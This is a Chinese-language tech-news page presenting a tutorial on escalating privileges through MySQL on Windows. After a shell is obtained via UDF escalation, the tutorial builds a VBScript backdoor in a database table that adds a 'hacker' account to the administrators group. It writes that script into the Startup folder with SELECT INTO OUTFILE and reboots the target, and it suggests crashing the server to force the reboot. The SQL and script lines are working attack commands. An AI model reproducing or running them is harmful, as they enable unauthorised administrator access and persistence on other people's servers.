tft每日頭條

 > 科技

 > 數據庫初始化查詢

數據庫初始化查詢

科技 更新时间:2024-12-02 13:59:20
開機啟動項提權

• 開機啟動項提權原理:利用mysql,将後門寫入開機自啟動項。同時因為是開機自啟動,寫入之後,需要重啟目标服務器。(這個要求mysql的權限就很高,至少是管理員權限甚至是system,可以利用一些漏洞嘗試打藍屏重啟)

• windows的開機啟動地址:

C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

1、利用UDF提權得到的shell

數據庫初始化查詢(數據庫提權開機啟動項提權)1

UDF提權的到的shell

2、創建表

create table dota(cmd text);

數據庫初始化查詢(數據庫提權開機啟動項提權)2

創建表

3、插入數據

insert into dota values("set wshshell=createobject(""wscript.shell"")"),("a=wshshell.run(""cmd.exe /c net user hacker admin@123 /add"",0)"),("b=wshshell.run(""cmd.exe /c net localgroup administrators hacker /add"",0)");

數據庫初始化查詢(數據庫提權開機啟動項提權)3

插入啟動腳本數據

4、寫入開機啟動文件

select * from dota into outfile " C:\\Users\\Administrator.WIN702\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\adduser.vbs";

數據庫初始化查詢(數據庫提權開機啟動項提權)4

寫入開機啟動文件

5、查看開機啟動文件

數據庫初始化查詢(數據庫提權開機啟動項提權)5

數據庫初始化查詢(數據庫提權開機啟動項提權)6

查看開機啟動文件

6、重啟開機啟動

數據庫初始化查詢(數據庫提權開機啟動項提權)7

開機啟動

•開機啟動,發現 hacker 賬戶已經增加成功

,

更多精彩资讯请关注tft每日頭條,我们将持续为您更新最新资讯!

查看全部

相关科技资讯推荐

热门科技资讯推荐

网友关注

Copyright 2023-2024 - www.tftnews.com All Rights Reserved